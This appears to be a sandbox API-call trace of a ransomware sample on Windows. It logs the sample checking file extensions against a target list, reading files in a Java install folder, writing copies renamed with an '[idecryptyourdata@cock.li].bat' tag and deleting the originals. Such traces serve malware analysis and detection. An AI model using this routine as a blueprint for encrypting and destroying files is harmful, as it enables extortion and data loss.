[0057.020] lstrlenW (lpString=".doc") returned 4 [0057.020] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0057.020] lstrlenW (lpString=".docx") returned 5 [0057.020] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0057.020] lstrlenW (lpString=".pdf") returned 4 [0057.020] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0057.020] lstrlenW (lpString=".xls") returned 4 [0057.020] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0057.020] lstrlenW (lpString=".xlsx") returned 5 [0057.020] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0057.020] lstrlenW (lpString=".ppt") returned 4 [0057.020] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0057.020] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.020] lstrlenW (lpString=".zip") returned 4 [0057.020] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0057.020] lstrlenW (lpString=".rar") returned 4 [0057.020] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0057.020] lstrlenW (lpString=".bz2") returned 4 [0057.020] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0057.020] lstrlenW (lpString=".7z") returned 3 [0057.020] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0057.020] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.020] lstrlenW (lpString=".dbf") returned 4 [0057.020] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0057.020] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.020] lstrlenW (lpString=".1cd") returned 4 [0057.020] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0057.021] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif") returned 79 [0057.021] lstrlenW (lpString=".jpg") returned 4 [0057.021] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0057.021] lstrcmpiW (lpString1=".txt", lpString2=".bat") returned 1 [0057.021] lstrlenW (lpString="README.txt") returned 10 [0057.021] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0057.023] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=46) returned 1 [0057.023] CloseHandle (hObject=0x2e4) returned 1 [0057.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt")) returned 0x20 [0057.023] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.024] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.024] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.024] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.024] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0057.025] GetLastError () returned 0x0 [0057.025] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2e, lpOverlapped=0x0) returned 1 [0057.026] WriteFile (in: hFile=0x348, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x30, lpOverlapped=0x0) returned 1 [0057.027] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0057.027] WriteFile (in: hFile=0x348, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe8, lpOverlapped=0x0) returned 1 [0057.027] SetEndOfFile (hFile=0x348) returned 1 [0057.027] CloseHandle (hObject=0x348) returned 1 [0057.028] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.028] SetEndOfFile (hFile=0x358) returned 1 [0057.029] CloseHandle (hObject=0x358) returned 1 [0057.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.029] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt")) returned 1 [0057.029] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.029] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.029] lstrlenW (lpString=".doc") returned 4 [0057.029] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.029] lstrlenW (lpString=".docx") returned 5 [0057.029] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0057.030] lstrlenW (lpString=".pdf") returned 4 [0057.030] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString=".xls") returned 4 [0057.030] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.030] lstrlenW (lpString=".xlsx") returned 5 [0057.030] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0057.030] lstrlenW (lpString=".ppt") returned 4 [0057.030] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.030] lstrlenW (lpString=".zip") returned 4 [0057.030] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.030] lstrlenW (lpString=".rar") returned 4 [0057.030] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString=".bz2") returned 4 [0057.030] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString=".7z") returned 3 [0057.030] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.030] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.030] lstrlenW (lpString=".dbf") returned 4 [0057.030] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.030] lstrlenW (lpString=".1cd") returned 4 [0057.030] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.030] lstrlenW (lpString=".jpg") returned 4 [0057.030] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.030] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.030] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.031] lstrlenW (lpString=".doc") returned 4 [0057.031] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString=".docx") returned 5 [0057.031] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0057.031] lstrlenW (lpString=".pdf") returned 4 [0057.031] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString=".xls") returned 4 [0057.031] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.031] lstrlenW (lpString=".xlsx") returned 5 [0057.031] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0057.031] lstrlenW (lpString=".ppt") returned 4 [0057.031] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.031] lstrlenW (lpString=".zip") returned 4 [0057.031] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.031] lstrlenW (lpString=".rar") returned 4 [0057.031] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString=".bz2") returned 4 [0057.031] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString=".7z") returned 3 [0057.031] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.031] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.031] lstrlenW (lpString=".dbf") returned 4 [0057.031] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.031] lstrlenW (lpString=".1cd") returned 4 [0057.031] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.031] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0057.031] lstrlenW (lpString=".jpg") returned 4 [0057.031] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.032] lstrcmpiW (lpString1=".txt", lpString2=".bat") returned 1 [0057.032] lstrlenW (lpString="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 34 [0057.032] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.032] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=63933) returned 1 [0057.032] CloseHandle (hObject=0x358) returned 1 [0057.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt")) returned 0x20 [0057.032] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.032] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.032] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.033] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.033] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0057.033] GetLastError () returned 0x0 [0057.033] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xf9bd, lpOverlapped=0x0) returned 1 [0057.054] WriteFile (in: hFile=0x348, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xf9c0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xf9c0, lpOverlapped=0x0) returned 1 [0057.056] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0057.056] WriteFile (in: hFile=0x348, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x118, lpOverlapped=0x0) returned 1 [0057.057] SetEndOfFile (hFile=0x348) returned 1 [0057.057] CloseHandle (hObject=0x348) returned 1 [0057.059] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.059] SetEndOfFile (hFile=0x358) returned 1 [0057.060] CloseHandle (hObject=0x358) returned 1 [0057.060] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.060] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt")) returned 1 [0057.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.061] lstrlenW (lpString=".doc") returned 4 [0057.061] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.061] lstrlenW (lpString=".docx") returned 5 [0057.061] lstrcmpiW (lpString1=".docx", lpString2="X.txt") returned -1 [0057.061] lstrlenW (lpString=".pdf") returned 4 [0057.061] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.061] lstrlenW (lpString=".xls") returned 4 [0057.061] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.061] lstrlenW (lpString=".xlsx") returned 5 [0057.061] lstrcmpiW (lpString1=".xlsx", lpString2="X.txt") returned -1 [0057.061] lstrlenW (lpString=".ppt") returned 4 [0057.061] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.061] lstrlenW (lpString=".zip") returned 4 [0057.061] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.061] lstrlenW (lpString=".rar") returned 4 [0057.061] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.061] lstrlenW (lpString=".bz2") returned 4 [0057.061] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.061] lstrlenW (lpString=".7z") returned 3 [0057.061] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.061] lstrlenW (lpString=".dbf") returned 4 [0057.061] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.061] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.062] lstrlenW (lpString=".1cd") returned 4 [0057.062] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.062] lstrlenW (lpString=".jpg") returned 4 [0057.062] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.062] lstrlenW (lpString=".doc") returned 4 [0057.062] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString=".docx") returned 5 [0057.062] lstrcmpiW (lpString1=".docx", lpString2="X.txt") returned -1 [0057.062] lstrlenW (lpString=".pdf") returned 4 [0057.062] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString=".xls") returned 4 [0057.062] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.062] lstrlenW (lpString=".xlsx") returned 5 [0057.062] lstrcmpiW (lpString1=".xlsx", lpString2="X.txt") returned -1 [0057.062] lstrlenW (lpString=".ppt") returned 4 [0057.062] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.062] lstrlenW (lpString=".zip") returned 4 [0057.062] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.062] lstrlenW (lpString=".rar") returned 4 [0057.062] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString=".bz2") returned 4 [0057.062] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.062] lstrlenW (lpString=".7z") returned 3 [0057.062] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.063] lstrlenW (lpString=".dbf") returned 4 [0057.063] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.063] lstrlenW (lpString=".1cd") returned 4 [0057.063] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.063] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0057.063] lstrlenW (lpString=".jpg") returned 4 [0057.063] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.063] lstrcmpiW (lpString1=".txt", lpString2=".bat") returned 1 [0057.063] lstrlenW (lpString="THIRDPARTYLICENSEREADME.txt") returned 27 [0057.063] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.063] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=145180) returned 1 [0057.063] CloseHandle (hObject=0x358) returned 1 [0057.063] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt")) returned 0x20 [0057.064] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.064] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0057.064] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.064] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.064] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0057.064] GetLastError () returned 0x0 [0057.064] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x2371c, lpOverlapped=0x0) returned 1 [0057.939] WriteFile (in: hFile=0x348, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x23720, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x23720, lpOverlapped=0x0) returned 1 [0057.943] ReadFile (in: hFile=0x358, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0057.943] WriteFile (in: hFile=0x348, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x10a, lpOverlapped=0x0) returned 1 [0057.943] SetEndOfFile (hFile=0x348) returned 1 [0057.943] CloseHandle (hObject=0x348) returned 1 [0057.946] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0057.946] SetEndOfFile (hFile=0x358) returned 1 [0057.947] CloseHandle (hObject=0x358) returned 1 [0057.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.948] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt")) returned 1 [0057.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.948] lstrlenW (lpString=".doc") returned 4 [0057.948] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.948] lstrlenW (lpString=".docx") returned 5 [0057.948] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0057.948] lstrlenW (lpString=".pdf") returned 4 [0057.948] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.948] lstrlenW (lpString=".xls") returned 4 [0057.948] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.948] lstrlenW (lpString=".xlsx") returned 5 [0057.948] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0057.948] lstrlenW (lpString=".ppt") returned 4 [0057.948] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.948] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.948] lstrlenW (lpString=".zip") returned 4 [0057.948] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.948] lstrlenW (lpString=".rar") returned 4 [0057.948] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0057.948] lstrlenW (lpString=".bz2") returned 4 [0057.949] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString=".7z") returned 3 [0057.949] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0057.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.949] lstrlenW (lpString=".dbf") returned 4 [0057.949] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.949] lstrlenW (lpString=".1cd") returned 4 [0057.949] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.949] lstrlenW (lpString=".jpg") returned 4 [0057.949] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.949] lstrlenW (lpString=".doc") returned 4 [0057.949] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString=".docx") returned 5 [0057.949] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0057.949] lstrlenW (lpString=".pdf") returned 4 [0057.949] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString=".xls") returned 4 [0057.949] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0057.949] lstrlenW (lpString=".xlsx") returned 5 [0057.949] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0057.949] lstrlenW (lpString=".ppt") returned 4 [0057.949] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0057.949] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0057.949] lstrlenW (lpString=".zip") returned 4 [0057.949] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0057.949] lstrlenW (lpString=".rar") returned 4 [0057.949] lstrcmpiW 